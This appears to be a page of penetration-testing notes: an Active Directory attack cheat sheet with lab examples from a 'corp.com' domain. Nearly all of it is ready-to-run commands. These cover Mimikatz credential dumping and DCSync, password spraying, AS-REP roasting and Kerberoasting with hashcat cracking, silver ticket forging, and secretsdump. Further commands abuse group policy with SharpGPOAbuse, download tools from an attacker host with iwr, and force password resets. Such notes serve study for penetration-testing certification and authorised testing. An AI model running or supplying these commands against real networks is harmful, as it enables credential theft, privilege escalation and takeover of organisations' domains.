Attack

Mimikatz.exe

NOTE: Make sure to run PowerShell as Administrator

Launch Mimikatz.exe

C:\Tools\mimikatz.exe

Local Privilege Escalate

privilege::debug

Display Logged On Users NTLM Passwords

sekurlsa::logonpasswords

Display Local User NTLM Passwords

lsadump::sam

One liner

.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "sekurlsa::logonpasswords" "exit"

Enumeration

To view account policy

net accounts

Password Attacks

Spray-Passwords.ps1 (Target Machine)

C:\Tools\Spray-Passwords.ps1 -Pass <Password> -Admin

crackmapexec (Kali)

crackmapexec smb <Target IP Address> -u <Username Lists> -p '<Password>' -d <Domain Name> --continue-on-success

NOTE: If the output of crackmapexec includes "Pwn3d!", it indicates that the user has Administrative privileges on that machine

Kerbrute_windows_amd64.exe (Target Machine)

C:\Tools\kerbrute_windows_amd64.exe passwordspray -d <Domain Name> <Username Lists> "<Password>"

AS-REP Roasting

Impacket-GetNPUsers (Kali)

Get the users and their hashed password that has "Do not require Kerberos Preauthentication enabled"

impacket-GetNPUsers <DOMAIN NAME>/ -dc-ip <DC IP Address> -usersfile <Username Lists> -format hashcat -outputfile asrep_hashes.txt -no-pass

Crack the hashed password

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Rubeus (Target Machine)

Get the users and their hashed password that has "Do not require Kerberos Preauthentication enabled"

C:\Tools\Rubeus.exe asreproast /nowrap

Crack the hashed password

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Kerberoasting

Impacket-GetNPUsers (Kali)

Get service hashed password

sudo impacket-GetUserSPNs -dc-ip <DC IP Address> -request -outputfile hashes.kerberoast <Domain Name>/<Username>

Crack the hashed password

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Rubeus (Target Machine)

Get service hashed password

C:\Tools\Rubeus.exe kerberoast /outfile:hashes.kerberoast

Crack the hashed password

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Silver Tickets

NOTE: Information needed

  • SPN password hash

  • Domain SID

  • Target SPN

Get SPN password hash from mimikatz.exe

C:\Tools\mimikatz.exe

privilege::debug

sekurlsa::logonpasswords

*Retrieve NTLM hash

Get Domain SID from user

whoami /user

Remove the numbers after the last -

EXAMPLE:

PS C:\Windows\system32> whoami /user                                                                                                                                                                                                            USER INFORMATION                                                                                                        ----------------                                                                                                                                                                                                                                User Name SID                                                                                                           ========= =============================================                                                                 corp\jeff S-1-5-21-1987370270-658905905-1781884369-1105                                                                 

# Domain SID = S-1-5-21-1987370270-658905905-1781884369

Get Target SPN from PowerView.ps1

Import-Module C:\Tools\PowerView.ps1

Get-NetUser -SPN | select samaccountname, serviceprincipalname

To forge the silver ticket in mimikatz.exe

kerberos::golden /sid:<Domain SID> /domain:<Domain Name> /ptt /target:<SPN Name> /server:<SPN Server> /rc4:<SPN Password Hash> /user:<Domain User>

EXAMPLE:

kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin

Dcsync

Mimikatz.exe (Target Machine)

To obtain the hash

lsadump::dcsync /user:<Domain Name>\<Username>

To crack it

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Impacket-secretsdump

impacket-secretsdump -just-dc-user <DC Username> corp.com/<Username>:'<Password>'@<DC IP Address>

NOTE: Get the NTLM hash from DRSUAPI method located before the ending trail of :

To crack it

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Exploits

SharpGPOAbuse.exe

wget https://github.com/byronkg/SharpGPOAbuse/raw/refs/heads/main/SharpGPOAbuse-master/SharpGPOAbuse.exe
1

Download SharpGPOAbuse.exe

iwr -Uri http://<Kali IP Address>/SharpGPOAbuse.exe -OutFile SharpGPOAbuse.exe
2

Run command

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <Username> --GPOName "<GPO DisplayName>"
3

Force Group Policy to update

gpupdate /force

Change password

NOTE: Must have permission on the user

net user <Username> <New Password> /domain
Set-ADAccountPassword -Identity "<Username>" -NewPassword (ConvertTo-SecureString "<New Password>" -AsPlainText -Force) -Reset

GUI

runas /user:<Domain Name>\<Username> cmd.exe

CLI

wget https://raw.githubusercontent.com/antonioCoco/RunasCs/refs/heads/master/Invoke-RunasCs.ps1
1

Download Invoke-RunasCs.ps1

iwr -Uri http://<Kali IP Address>/Invoke-RunasCs.ps1 -Outfile Invoke-RunasCs.ps1
2

Run command

Invoke-RunasCs -Username <Username> -Password <Password> -Command "<Command>"

Add user to group

NOTE: Must have permission on the group

net group "<Group Name>" <Username> /add /domain
PreviousEnumerationNextLateral Movement

Last updated